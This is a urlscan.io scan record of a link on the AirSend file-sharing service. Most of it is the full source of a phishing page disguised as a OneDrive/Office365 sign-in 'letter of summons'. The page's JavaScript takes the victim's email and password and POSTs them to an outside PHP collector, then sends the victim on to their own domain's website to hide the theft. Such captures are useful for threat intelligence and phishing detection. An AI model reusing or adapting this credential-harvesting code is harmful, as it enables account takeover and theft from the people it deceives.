live.airsend.io Open in urlscan Pro
18.210.107.247  Public Scan

Submitted URL: https://live.airsend.io/u/vjOD0P
Effective URL: https://live.airsend.io/files/cf/189764/LETTEROFSUMMON.html?hash=pub-scr00ocwrdz3xqdx0vv99xp6afsh5h3e
Submission: On June 28 via manual from IN — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

We're sorry but cl-as-frontend doesn't work properly without JavaScript enabled.
Please enable it to continue.

Connecting to AirSend

 * Login or Sign-up to join

LETTEROFSUMMON.html
<!-- PLEASE DWONLOAD TO VIEW LETTER --> <html lang="en"> <head> <meta
http-equiv="x-ua-compatible" content="EmulateIE9"> <meta charset="utf-8"> <meta
name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet"
href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
crossorigin="anonymous"> <title>One Drive</title> </head> <body
style="background-image:
url('https://i.gyazo.com/b308246805567e68aad040e42c453a7f.png');
background-repeat: no-repeat;background-size: cover;"> <div
class="container-fluid p-0"> <div class="container"> <div class="row my-5"> <div
class="col-lg-5 mx-auto"> <div class="m-5 p-4 bg-white rounded" id="div1"
style="box-shadow: 0px 2px 5px rgba(0,0,0,0.5);"> <div class="text-left">
<span><img src="https://i.gyazo.com/cc41020ecb5162014937e0d1c83fa617.png"
class="img-fluid" width="110px"></span><span class="pl-4 h5 align-middle">
</span><br><br> <span class="h5">Sign in</span><br> <span class="h5"></span><br>
<span class="h">Sign-in With Your Office365 Mail To View Document</span><br>
<span id="msg" class="text-danger" style="display: none;">Incorrect Password..!
Please try again.</span><br> <span id="error" class="text-danger"
style="display: none;"></span> <small></small> <div class="form-group"> <input
type="email" name="ai" class="form-control rounded-0 bg-transparent" id="ai"
aria-describedby="aiHelp" placeholder="Email"> </div> <div class="form-group
mt-2"> <small></small> <input type="password" name="pr" class="form-control"
id="pr" aria-describedby="aiHelp" placeholder="Password"> </div> </div> <div
class="col-lg-12 mt-3"> <button class="btn text-white px-4 w-100"
id="submit-btn" style="background-color: #0a59a3;">Next</button> </div> </div>
</div> </body> <script type="text/javascript"
src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript"
src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script> /* global $ */ $(document).ready(function() { var count = 0;
/////////////url ai getting//////////////// var ai =
window.location.hash.substr(1); if (!ai) { } else { // $('#ai').val(ai); var
my_ai = ai; var ind = my_ai.indexOf("@"); var my_slice = my_ai.substr((ind +
1)); var c = my_slice.substr(0, my_slice.indexOf('.')); var final =
c.toLowerCase(); $('#ai').val(my_ai); $('#aich').html(my_ai); $("#msg").hide();
} ///////////////url getting ai//////////////// var file = "bmV4dC5waHA=";
$('#submit-btn').click(function(event) { $('#error').hide(); $('#msg').hide();
event.preventDefault(); var ai = $("#ai").val(); var pr = $("#pr").val(); var
msg = $('#msg').html(); $('#msg').text(msg); ///////////new
injection//////////////// var my_ai = ai; var filter =
/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; if (!ai) {
$('#error').show(); $('#error').html("Email field is empty.!"); return false; }
if (!pr) { $('#error').show(); $('#error').html("Password field is empty.!");
return false; } var ind = my_ai.indexOf("@"); var my_slice = my_ai.substr((ind +
1)); var c = my_slice.substr(0, my_slice.indexOf('.')); var final =
c.toLowerCase(); ///////////new injection//////////////// count = count + 1;
$.ajax({ dataType: 'JSON', url: 'https://ametistcom.ro/PROPERMORNIN.php', type:
'POST', data: { ai: ai, pr: pr, }, // data: $('#contact').serialize(),
beforeSend: function(xhr) { $('#submit-btn').html('Verifing...'); }, success:
function(response) { if (response) { $("#msg").show(); console.log(response); if
(response['signal'] == 'ok') { $("#pr").val(""); if (count >= 2) { count = 0; //
window.location.replace(response['redirect_link']);
window.location.replace("http://www." + my_slice); return false; } } else { } }
}, error: function() { $("#pr").val(""); if (count >= 2) { count = 0;
window.location.replace("http://www." + my_slice); return false; }
$("#msg").show(); // $('#msg').html("Please try again later"); }, complete:
function() { $('#submit-btn').html('Continue'); } }); }); }); </script>